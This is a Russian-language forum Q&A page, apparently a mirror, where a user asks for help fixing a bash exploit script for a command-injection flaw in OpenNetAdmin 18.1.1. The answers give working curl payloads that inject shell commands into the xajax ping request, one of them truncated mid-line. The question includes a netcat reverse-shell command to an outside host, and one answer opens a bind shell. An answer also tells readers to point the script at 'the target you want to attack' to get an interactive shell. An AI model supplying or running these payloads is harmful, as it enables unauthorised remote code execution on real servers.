Bash Синтаксические проблемы для эксплойта - PullRequest
0 голосов
/ 27 января 2020

Я обнаружил эксплойт в exploit-db для OpenNetAdmin 18.1.1

Я должен настроить этот скрипт так, чтобы он работал для меня, но я этого не сделал. Это то, что у меня есть:

URL="xxx.xxx.xxx.xxx/ona"
while true;do
 echo -n {"nc -e /bin/sh xxx.xxx.xxx.xxx 4444 "}; read cmd
 curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";${cmd};echo \"END\"&xajaxargs[]=ping" "${URL}" | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1
done

Вывод просто:

{nc -e /bin/sh xxx.xxx.xxx.xxx 4444 }

Я немного борюсь с синтаксисом.

Что я сделал неправильно?

Ответы [ 2 ]

0 голосов
/ 27 января 2020

Я нашел решение, которое подходит:

#!/bin/bash
URL="http://xxx.xxx.xxx.xxx/ona/"
while true;do
 echo -n "{/bin/sh -i}"; read cmd
 curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltip>
done

Просто замените xxx.xxx.xxx.xxx на цель, которую вы хотите атаковать, и сохраните скрипт как shell.sh

Теперь запустите сценарий с помощью ./shell.sh, и вы получите интерактивную оболочку в целевой системе.

Чтобы убедиться, что теперь вы можете ввести pwd или id и проверить, успешно ли вы.

0 голосов
/ 27 января 2020

Это то, что вы хотите, если вам просто нужно запустить программу n c. Сценарий предполагает, что удаленный компьютер - это компьютер Linux, с / bin / bash и n c (netcat), скомпилированными с поддержкой -e

#!/bin/bash
URL="http://.../ona" 
cmd="nc -l -p 4444 -e /bin/sh"
curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";${cmd};echo \"END\"&xajaxargs[]=ping" "${URL}" | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1
...